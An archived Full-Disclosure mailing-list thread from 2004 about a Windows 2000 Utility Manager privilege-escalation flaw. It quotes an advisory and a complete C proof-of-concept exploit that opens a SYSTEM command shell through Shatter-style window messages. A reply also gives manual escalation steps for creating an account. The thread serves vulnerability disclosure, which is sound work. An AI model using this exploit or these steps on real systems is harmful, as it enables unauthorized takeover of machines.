[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <01d901c42810$3bc5c0e0$0201a8c0@globint.com.ar>
From: secemf at yahoo.com.ar (Esteban Martínez Fayó)
Subject: Norton AntiVirus nested file manual scan bypass.....
----- Original Message -----
From: "natch" <lists@...ch.net>
To: <full-disclosure@...ts.netsys.com>
Sent: Monday, April 19, 2004 1:49 PM
Subject: Re: [Full-Disclosure] Norton AntiVirus nested file manual scan
bypass.....
> Nice, but the faster method is to copy \winnt\system32\cmd.exe to
> \winnt\winhlp32.exe (can be done as a normal user), hit win+u, then f1.
You are wrong. A normal user cannot overwrite \winnt\winhlp32.exe with the
default NTFS file permissions of Windows 2000.
> When the command prompt comes up it has elevated privileges. From there
> you can run MMC.exe, open up \winnt\system32\lusrmgr.msc and create a
> new account.
>
> No external program needed. The microsoft patch simply removes the
> contextual help.
>
> -
> natch
>
> Vivek Rathod (Application Security, Inc.) wrote:
>
> > Microsoft Windows Utility Manager Vulnerability
> >
> > April 13, 2004
> >
> > Risk Level: High
> >
> > Summary:
> > A local elevation of privileges vulnerability exists on the Windows
> > Utility
> > Manager that allows to any user to take complete control over the
> > operating
> > system.
> >
> > Versions Affected:
> > All products in the Windows 2000 operating system family.
> >
> > Details:
> > Microsoft Windows 2000 contains support for Accessibility options
> > within the
> > operating system. Accessibility support is a series of assistive
> > technologies
> > within Windows that allow users with disabilities to still be able to
> > access the
> > functions of the operating system. Accessibility support is enabled or
> > disabled
> > through shortcuts built into the operating system, or through the
> > Accessibility
> > Utility Manager. The Utility Manager is an accessibility utility that
> > allows
> > users to check the status of Accessibility programs (Magnifier,
> > Narrator, On-
> > Screen Keyboard) and start or stop them. The Utility Manager can be
> > invoked by
> > pressing Windows Key + U or executing "utilman.exe /start" from the
> > command
> > line. The Utility Manager Service is enabled by default and runs in the
> > interactive desktop with Local System privileges.
> >
> > The Utility Manager has support for context sensitive help. Users can
> > access
> > this by clicking in the "?" on the title bar and then on an object or by
> > pressing the F1 key after selecting an object. In order to display the
> > help,
> > Utility Manager loads winhlp32.exe but does not drop System privileges.
> > Therefore, winhlp32.exe is executed under the Local System account.
While
> > winhlp32.exe is executing it is possible to send Windows messages to
> > it and
> > attack it with "Shatter" style attacks.
> >
> > Winhlp32.exe is executed with its main window hidden but it is very
> > trivial to
> > make it visible. Once the window is made visible, a typical attack would
> > involve using the ?File Open? dialog to execute a program such as
> > ?cmd.exe.?
> > Since the Help window has Local System privileges, the executed
> > program will
> > have the same privileges.
> >
> > Further information is available at:
> > http://www.appsecinc.com/resources/alerts/general/04-0001.html
> > http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
> > http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
> >
> > Fix:
> >
http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en
> >
> >
> > Acknowledgments:
> > Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application
> > Security, Inc. (http://www.appsecinc.com) and to
> > Brett Moore of Security-Assessment.com (http://security-assessment.com).
> >
> > Please find the proof-of-concept exploit code attached
> >
> > ___________________________________________
> > AppSecInc Team SHATTER
> > Tel: 1-866-927-7732
> > E-mail: shatter@...secinc.com
> > Web: www.appsecinc.com
> >
> > Application Security, Inc.
> > "Securing Business by Securing Enterprise Applications"
> >
> > ------------------------------------------------------------------------
> >
> > // By Cesar Cerrudo (cesar@...secinc.com)
> > // Local elevation of priviliges exploit for Windows Utility Manager
> > // Gives you a shell with system privileges
> > // If you have problems try changing Sleep() values.
> >
> > #include <stdio.h> #include <windows.h> #include <commctrl.h>
> > #include <Winuser.h>
> >
> > int main(int argc, char *argv[]) { HWND lHandle, lHandle2;
> > POINT point;
> >
> > char sText[]="%windir%\\system32\\cmd.ex?";
> >
> > // run utility manager
> > system("utilman.exe /start");
> > Sleep(500);
> >
> > // execute contextual help
> > SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
> > Sleep(500);
> >
> > // open file open dialog windown in Windows Help
> > PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
> > Sleep(500);
> >
> > // find open file dialog window
> > lHandle = FindWindow("#32770","Open");
> >
> > // get input box handle
> > lHandle2 = GetDlgItem(lHandle, 0x47C);
> > Sleep(500);
> >
> > // set text to filter listview to display only cmd.exe
> > SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
> > Sleep(800);
> >
> > // send return
> > SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
> >
> > //get navigation bar handle
> > lHandle2 = GetDlgItem(lHandle, 0x4A0);
> > //send tab
> > SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
> > Sleep(500);
> > lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
> > //get list view handle
> > lHandle2 = GetDlgItem(lHandle2, 0x1);
> >
> > SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
> > SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
> > SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
> > Sleep(500);
> >
> > // popup context menu
> > PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
> > Sleep(1000);
> >
> > // get context menu handle
> > point.x =10; point.y =30;
> > lHandle2=WindowFromPoint(point);
> >
> > SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
> > SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
> > SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
> >
> > SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
> >
> > return(0);
> > }
> >
> >
> >
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists